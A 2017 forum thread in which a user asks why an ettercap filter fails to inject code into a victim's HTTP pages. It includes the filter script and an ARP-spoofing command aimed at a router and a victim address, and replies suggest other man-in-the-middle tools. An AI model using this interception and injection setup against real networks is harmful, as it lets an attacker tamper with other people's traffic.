kdlsw Posted April 9, 2017

I'm trying to perform a JavaScript injection with ettercap 0.8.2 and its filter, but it did not work. All the relevant topics I found are from before 2016, so I am not sure if this kind of attack still works now. Anyway, this is my filter script:

    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Nothing!");
            msg("zapped Accept-Encoding!\n");
        }
    }

    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "<head>")) {
            replace("<head>", "<HEAD>");
            msg("Code injected");
        }
    }

And I run it as:

    ettercap -T -q -i wlan0 -F test.ef -M arp:remote /192.168.0.1// /192.168.0.100//

test.ef is the compiled filter file. When the victim opens any web page, I get a lot of "zapped Accept-Encoding!" messages, but no "Code injected", and of course the HTML source code on the victim side is untouched.

The part I really don't understand is, if I remove the search condition for the second part,

    if (ip.proto == TCP && tcp.dst == 80) {
        replace("<head>", "<HEAD>");
        msg("Code injected");
    }

the "Code injected" message shows, but the HTML code on the web client is not changed, which means the problem is that the filter cannot find any named strings (in this case <head>) in the HTML file; it can only deal with the header (Accept-Encoding).

Does anyone know a solution or workaround? Please, any suggestions will be appreciated, thanks.

0phoi5 Posted April 10, 2017

I've had recent success with Ettercap and Driftnet, so that basic aspect still works for unencrypted traffic, but haven't tried code injection using Ettercap any time recently.

digip Posted April 10, 2017

There is also bettercap.

kdlsw Posted April 10, 2017

@digip Thanks, I will look into that. So many options for mitm these days. I just tested MITMF, another similar tool, which didn't work for me too well; hope this one is good. Thank you.

digip Posted April 10, 2017

2 hours ago, kdlsw said:
> @digip Thanks, I will look into that. So many options for mitm these days. I just tested MITMF, another similar tool, which didn't work for me too well; hope this one is good. Thank you.

If you're using Kali, a lot of these tools should be installed, and if not, are in the repo and should all work once installed, dependencies as well. Often it's something simple though, like forgetting to add a switch or IP forward for a tool like mitm attacks.

kdlsw Posted April 11, 2017

10 hours ago, digip said:
> If you're using Kali, a lot of these tools should be installed, and if not, are in the repo and should all work once installed, dependencies as well. Often it's something simple though, like forgetting to add a switch or IP forward for a tool like mitm attacks.

Thank you, this is helpful! I will try it!